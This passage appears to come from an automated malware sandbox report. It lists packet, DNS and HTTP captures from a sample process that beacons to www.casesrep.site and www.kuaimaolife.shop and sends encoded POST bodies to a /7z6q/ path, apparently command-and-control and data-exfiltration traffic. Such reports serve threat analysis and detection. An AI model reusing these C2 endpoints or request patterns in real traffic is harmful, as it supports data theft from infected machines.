                                          Oct 5, 2024 14:51:39.172648907 CEST805000884.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:39.172660112 CEST805000884.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:39.172671080 CEST805000884.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:39.172681093 CEST805000884.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:39.172694921 CEST805000884.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:39.172703981 CEST805000884.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:39.172827005 CEST5000880192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:39.172869921 CEST5000880192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:39.179131031 CEST5000880192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:39.184118986 CEST805000884.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:44.964231014 CEST5000980192.168.2.438.55.251.233
                                          Oct 5, 2024 14:51:44.969228983 CEST805000938.55.251.233192.168.2.4
                                          Oct 5, 2024 14:51:44.969317913 CEST5000980192.168.2.438.55.251.233
                                          Oct 5, 2024 14:51:45.038877964 CEST5000980192.168.2.438.55.251.233
                                          Oct 5, 2024 14:51:45.044363976 CEST805000938.55.251.233192.168.2.4
                                          Oct 5, 2024 14:51:45.818104982 CEST805000938.55.251.233192.168.2.4
                                          Oct 5, 2024 14:51:45.818223000 CEST805000938.55.251.233192.168.2.4
                                          Oct 5, 2024 14:51:45.818423033 CEST5000980192.168.2.438.55.251.233
                                          Oct 5, 2024 14:51:46.555573940 CEST5000980192.168.2.438.55.251.233
                                          Oct 5, 2024 14:51:47.573926926 CEST5001080192.168.2.438.55.251.233
                                          Oct 5, 2024 14:51:47.581599951 CEST805001038.55.251.233192.168.2.4
                                          Oct 5, 2024 14:51:47.581679106 CEST5001080192.168.2.438.55.251.233
                                          Oct 5, 2024 14:51:47.599777937 CEST5001080192.168.2.438.55.251.233
                                          Oct 5, 2024 14:51:47.606007099 CEST805001038.55.251.233192.168.2.4
                                          Oct 5, 2024 14:51:48.442344904 CEST805001038.55.251.233192.168.2.4
                                          Oct 5, 2024 14:51:48.442404032 CEST805001038.55.251.233192.168.2.4
                                          Oct 5, 2024 14:51:48.442548037 CEST5001080192.168.2.438.55.251.233
                                          Oct 5, 2024 14:51:49.462383986 CEST5001080192.168.2.438.55.251.233

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 5, 2024 14:49:43.484046936 CEST6127553192.168.2.41.1.1.1
                                          Oct 5, 2024 14:49:43.499520063 CEST53612751.1.1.1192.168.2.4
                                          Oct 5, 2024 14:49:46.811347961 CEST6335053192.168.2.41.1.1.1
                                          Oct 5, 2024 14:49:46.822504044 CEST53633501.1.1.1192.168.2.4
                                          Oct 5, 2024 14:51:15.288131952 CEST5680853192.168.2.41.1.1.1
                                          Oct 5, 2024 14:51:15.336386919 CEST53568081.1.1.1192.168.2.4
                                          Oct 5, 2024 14:51:44.184854031 CEST6284753192.168.2.41.1.1.1
                                          Oct 5, 2024 14:51:44.943151951 CEST53628471.1.1.1192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Oct 5, 2024 14:49:43.484046936 CEST192.168.2.41.1.1.10xa6e0Standard query (0)6777.6777.6777.677eA (IP address)IN (0x0001)false
                                          Oct 5, 2024 14:49:46.811347961 CEST192.168.2.41.1.1.10xe37eStandard query (0)pub-2f7d07153ea1403184d62266d9c28e41.r2.devA (IP address)IN (0x0001)false
                                          Oct 5, 2024 14:51:15.288131952 CEST192.168.2.41.1.1.10xce12Standard query (0)www.casesrep.siteA (IP address)IN (0x0001)false
                                          Oct 5, 2024 14:51:44.184854031 CEST192.168.2.41.1.1.10x77c5Standard query (0)www.kuaimaolife.shopA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Oct 5, 2024 14:49:43.499520063 CEST1.1.1.1192.168.2.40xa6e0Name error (3)6777.6777.6777.677enonenoneA (IP address)IN (0x0001)false
                                          Oct 5, 2024 14:49:46.822504044 CEST1.1.1.1192.168.2.40xe37eNo error (0)pub-2f7d07153ea1403184d62266d9c28e41.r2.dev162.159.140.237A (IP address)IN (0x0001)false
                                          Oct 5, 2024 14:49:46.822504044 CEST1.1.1.1192.168.2.40xe37eNo error (0)pub-2f7d07153ea1403184d62266d9c28e41.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                                          Oct 5, 2024 14:51:15.336386919 CEST1.1.1.1192.168.2.40xce12No error (0)www.casesrep.sitecasesrep.siteCNAME (Canonical name)IN (0x0001)false
                                          Oct 5, 2024 14:51:15.336386919 CEST1.1.1.1192.168.2.40xce12No error (0)casesrep.site84.32.84.32A (IP address)IN (0x0001)false
                                          Oct 5, 2024 14:51:44.943151951 CEST1.1.1.1192.168.2.40x77c5No error (0)www.kuaimaolife.shop38.55.251.233A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
                                          • www.casesrep.site
                                          • www.kuaimaolife.shop

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.44994684.32.84.32801696C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 5, 2024 14:51:15.394817114 CEST338OUTGET /7z6q/?-Ly=tZ6DMnK&ZppxP=TL3drwoENxP57Dd5dOFmv/YKWz0ccyhnGCQdWwUu3IMTL8D4S+Gi1DMSnGJbZzhysdvLIJdHJUOvGXStrAsLXN7Ufb7PIiPGRqZTCzOmV2/ygr+YHVnslTQ= HTTP/1.1
                                          Accept: */*
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.casesrep.site
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
                                          Oct 5, 2024 14:51:15.879261971 CEST1236INHTTP/1.1 200 OK
                                          Server: hcdn
                                          Date: Sat, 05 Oct 2024 12:51:15 GMT
                                          Content-Type: text/html
                                          Content-Length: 10072
                                          Connection: close
                                          Vary: Accept-Encoding
                                          alt-svc: h3=":443"; ma=86400
                                          x-hcdn-request-id: aba4e4092a26c7a9352b7b30672feb8c-bos-edge4
                                          Expires: Sat, 05 Oct 2024 12:51:14 GMT
                                          Cache-Control: no-cache
                                          Accept-Ranges: bytes
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                          Oct 5, 2024 14:51:15.879292011 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                          Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                          Oct 5, 2024 14:51:15.879308939 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                          Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                          Oct 5, 2024 14:51:15.879324913 CEST672INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                          Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                          Oct 5, 2024 14:51:15.879343033 CEST1236INData Raw: 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77
                                          Data Ascii: sync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32
                                          Oct 5, 2024 14:51:15.879360914 CEST1236INData Raw: 6f 67 69 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 61 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 65 6d 70 74 79 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61
                                          Data Ascii: ogin</a></li></ul></div></div></nav><div class=empty-account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</di
                                          Oct 5, 2024 14:51:15.879380941 CEST1236INData Raw: 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 61 72 74 69 63 6c 65 73 2f 31 35 38 33 32 31 34 2d 68 6f 77 2d 74 6f 2d 61 64 64 2d 61 2d 64 6f 6d 61 69 6e 2d 74 6f 2d 6d 79 2d 61 63 63 6f 75 6e 74 2d 68 6f 77 2d 74 6f 2d
                                          Data Ascii: upport.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change
                                          Oct 5, 2024 14:51:15.879411936 CEST104INData Raw: 68 2e 66 6c 6f 6f 72 28 72 2f 37 30 30 29 3a 72 3e 3e 31 2c 72 2b 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 65 29 2c 74 3d 30 3b 34 35 35 3c 72 3b 74 2b 3d 6f 29 72 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 33 35 29 3b 72 65 74 75 72 6e 20 4d 61
                                          Data Ascii: h.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36*r/(r+38)
                                          Oct 5, 2024 14:51:15.879599094 CEST1236INData Raw: 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67 74 68 3b 66
                                          Data Ascii: )}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input
                                          Oct 5, 2024 14:51:15.879612923 CEST224INData Raw: 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b 69 3c 76 3b
                                          Data Ascii: (m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,
                                          Oct 5, 2024 14:51:15.879645109 CEST760INData Raw: 64 3d 30 3b 64 3c 76 3b 2b 2b 64 29 7b 69 66 28 28 43 3d 74 5b 64 5d 29 3c 68 26 26 2b 2b 66 3e 72 29 72 65 74 75 72 6e 20 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 32 29 22 29 3b 69 66 28 43 3d 3d 68 29 7b 66 6f
                                          Data Ascii: d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.45000584.32.84.32801696C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 5, 2024 14:51:31.031192064 CEST609OUTPOST /7z6q/ HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.casesrep.site
                                          Origin: http://www.casesrep.site
                                          Connection: close
                                          Cache-Control: max-age=0
                                          Content-Length: 202
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.casesrep.site/7z6q/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
                                          Data Raw: 5a 70 70 78 50 3d 65 4a 66 39 6f 48 56 4e 59 53 50 46 68 45 68 39 66 73 6c 76 30 71 34 4f 65 7a 38 78 4a 45 51 7a 51 52 73 66 51 44 6b 52 74 37 68 77 59 66 33 41 66 50 44 59 74 7a 77 62 6c 33 56 47 52 46 46 30 6f 73 43 6e 58 5a 46 67 4a 6d 6a 2b 41 57 48 69 70 58 63 45 46 4e 7a 42 65 59 7a 6d 45 57 76 79 55 73 52 7a 43 44 43 48 50 45 48 67 77 4c 4f 32 4d 57 4b 61 72 52 4c 2b 59 6f 55 39 67 70 6e 36 32 35 66 38 6b 54 33 4d 67 55 6e 7a 79 32 47 71 42 71 72 59 35 33 56 79 39 66 42 45 4e 4a 77 58 35 4c 57 6f 52 4e 6e 6e 51 47 73 70 64 72 4a 64 6c 55 48 32 6c 50 71 2f 32 4c 4a 57 4d 39 56 54 69 51 3d 3d
                                          Data Ascii: ZppxP=eJf9oHVNYSPFhEh9fslv0q4Oez8xJEQzQRsfQDkRt7hwYf3AfPDYtzwbl3VGRFF0osCnXZFgJmj+AWHipXcEFNzBeYzmEWvyUsRzCDCHPEHgwLO2MWKarRL+YoU9gpn625f8kT3MgUnzy2GqBqrY53Vy9fBENJwX5LWoRNnnQGspdrJdlUH2lPq/2LJWM9VTiQ==


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.45000684.32.84.32801696C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 5, 2024 14:51:33.612529993 CEST629OUTPOST /7z6q/ HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.casesrep.site
                                          Origin: http://www.casesrep.site
                                          Connection: close
                                          Cache-Control: max-age=0
                                          Content-Length: 222
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.casesrep.site/7z6q/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
                                          Data Raw: 5a 70 70 78 50 3d 65 4a 66 39 6f 48 56 4e 59 53 50 46 6a 6b 52 39 54 72 78 76 7a 4b 34 42 64 7a 38 78 41 6b 51 2f 51 51 51 66 51 42 49 42 74 70 56 77 62 2b 48 41 63 4f 44 59 75 7a 77 62 71 58 55 4e 4d 56 46 6a 6f 73 4f 65 58 59 35 67 4a 6d 6e 2b 41 58 33 69 70 45 6b 48 58 4e 7a 50 48 49 7a 6b 4a 32 76 79 55 73 52 7a 43 44 57 74 50 45 66 67 77 62 2b 32 65 33 4b 5a 69 78 4c 35 49 59 55 39 74 4a 6e 2b 32 35 66 6b 6b 53 72 31 67 57 66 7a 79 7a 69 71 42 37 72 62 77 33 56 6f 6a 76 41 6f 4b 35 4d 65 68 59 7a 6f 62 39 50 56 50 48 56 4a 63 74 59 48 30 6c 6d 68 33 50 4f 4d 72 4d 41 69 42 2b 6f 61 35 61 65 2b 41 44 41 4a 2b 41 45 37 6b 6e 4a 68 36 36 34 52 2b 44 55 3d
                                          Data Ascii: ZppxP=eJf9oHVNYSPFjkR9TrxvzK4Bdz8xAkQ/QQQfQBIBtpVwb+HAcODYuzwbqXUNMVFjosOeXY5gJmn+AX3ipEkHXNzPHIzkJ2vyUsRzCDWtPEfgwb+2e3KZixL5IYU9tJn+25fkkSr1gWfzyziqB7rbw3VojvAoK5MehYzob9PVPHVJctYH0lmh3POMrMAiB+oa5ae+ADAJ+AE7knJh664R+DU=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.45000784.32.84.32801696C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 5, 2024 14:51:36.174041986 CEST10711OUTPOST /7z6q/ HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.casesrep.site
                                          Origin: http://www.casesrep.site
                                          Connection: close
                                          Cache-Control: max-age=0
                                          Content-Length: 10302
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.casesrep.site/7z6q/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
                                          Data Raw: 5a 70 70 78 50 3d 65 4a 66 39 6f 48 56 4e 59 53 50 46 6a 6b 52 39 54 72 78 76 7a 4b 34 42 64 7a 38 78 41 6b 51 2f 51 51 51 66 51 42 49 42 74 70 4e 77 59 49 62 41 65 70 66 59 67 54 77 62 6a 33 55 4f 4d 56 46 69 6f 73 48 57 58 59 31 77 4a 6b 50 2b 42 31 2f 69 34 46 6b 48 4e 64 7a 50 61 59 7a 6c 45 57 76 6e 55 74 39 76 43 44 47 74 50 45 66 67 77 59 6d 32 49 57 4b 5a 67 78 4c 2b 59 6f 55 50 67 70 6e 47 32 35 58 65 6b 54 66 6c 67 6d 2f 7a 78 53 65 71 4f 70 44 62 37 33 56 75 69 76 41 77 4b 35 42 47 68 59 76 65 62 39 4b 49 50 48 78 4a 66 73 31 6b 67 6c 69 41 6b 74 36 78 36 39 74 59 41 76 41 2f 77 71 61 4a 45 67 63 71 6a 69 49 56 2b 55 77 31 70 49 63 4c 70 31 30 68 58 73 2f 70 39 5a 58 36 69 71 69 5a 51 64 53 64 51 79 6d 65 78 51 74 6f 63 52 37 4f 68 48 4e 44 69 61 34 4e 36 41 54 64 6e 53 79 42 75 54 38 31 53 4e 2b 6e 4f 54 66 6d 51 78 49 72 2b 4f 74 48 6c 76 30 50 30 41 51 6a 43 58 34 73 54 4f 2b 4a 6e 79 4a 6f 46 5a 49 64 79 76 4f 30 46 57 47 63 39 69 4b 4c 78 50 64 49 75 5a 2f 55 57 6c 37 55 66 56 4b 44 [TRUNCATED]
                                          Data Ascii: ZppxP=eJf9oHVNYSPFjkR9TrxvzK4Bdz8xAkQ/QQQfQBIBtpNwYIbAepfYgTwbj3UOMVFiosHWXY1wJkP+B1/i4FkHNdzPaYzlEWvnUt9vCDGtPEfgwYm2IWKZgxL+YoUPgpnG25XekTflgm/zxSeqOpDb73VuivAwK5BGhYveb9KIPHxJfs1kgliAkt6x69tYAvA/wqaJEgcqjiIV+Uw1pIcLp10hXs/p9ZX6iqiZQdSdQymexQtocR7OhHNDia4N6ATdnSyBuT81SN+nOTfmQxIr+OtHlv0P0AQjCX4sTO+JnyJoFZIdyvO0FWGc9iKLxPdIuZ/UWl7UfVKDP4YgpW/Veft8Uuo1O+kOHasehPvOtZbv2g/2v7oVjqE0SPJx2um+kGKovIi7GOxCFUkn8vfT0jF4iIQSck1Cc7/3gIbK8vvi88MkzitTsg9YEdEz0CqY6groqj2ntBSGmwLSbTM4ChEzuZZm53X7Ofjiv+n8Y5s9o62gTseme/SSQl9yNcZvZQN9d6vYJcFDqAdWH9RJOcslGct5FOKDkhbNcWwsmiSCwpc3MNkU0/Zwi8fBGBLzZD6kYgqFNmjxH14UkB29gRRZOae6oXZDLW8snWVI05eyZAUwo9Nr4ZCxRBJW7MbJr6WF8dMU1qcFxZNStq/HPCiR/dgYWrFfHGHagT5pxBtO7eAIB8jiu3MRPL5sAYaskHA4TqNqxXkm1pINoS+NdKIguh65zrB7yv8ChoYkbfljJFD1lYX93F8racqioFelD2qpJGZks1WYtCaRDJN6wpQw+8HTbSnRvgcHMn4qlR+XOmjymtwqrpHV8uoF59i4Dt4lFMEyYN4I09+6OMwgPHoxzLGbu9QW2/59LFcs7E/TzLJwxW6xhBRbDKO5qh1jPZRnQBA2rQbNWOjBnndBkLhVIplflCz+126b816MkaUmnmKpP12vD4US1+cuICtOVQT5vlOhflfrubmSluuuFmJDw/8wiHXbUcAV1rudkIfrpe [TRUNCATED]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.45000884.32.84.32801696C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 5, 2024 14:51:38.715034008 CEST338OUTGET /7z6q/?ZppxP=TL3drwoENxP57Dd5dOFmv/YKWz0ccyhnGCQdWwUu3IMTL8D4S+Gi1DMSnGJbZzhysdvLIJdHJUOvGXStrAsLXN7Ufb7PIiPGRqZTCzOmV2/ygr+YHVnslTQ=&-Ly=tZ6DMnK HTTP/1.1
                                          Accept: */*
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.casesrep.site
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
                                          Oct 5, 2024 14:51:39.172595024 CEST1236INHTTP/1.1 200 OK
                                          Server: hcdn
                                          Date: Sat, 05 Oct 2024 12:51:39 GMT
                                          Content-Type: text/html
                                          Content-Length: 10072
                                          Connection: close
                                          Vary: Accept-Encoding
                                          alt-svc: h3=":443"; ma=86400
                                          x-hcdn-request-id: 775bd875b6df18080c76fc97bdfc9aed-bos-edge4
                                          Expires: Sat, 05 Oct 2024 12:51:38 GMT
                                          Cache-Control: no-cache
                                          Accept-Ranges: bytes
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                          Oct 5, 2024 14:51:39.172616959 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
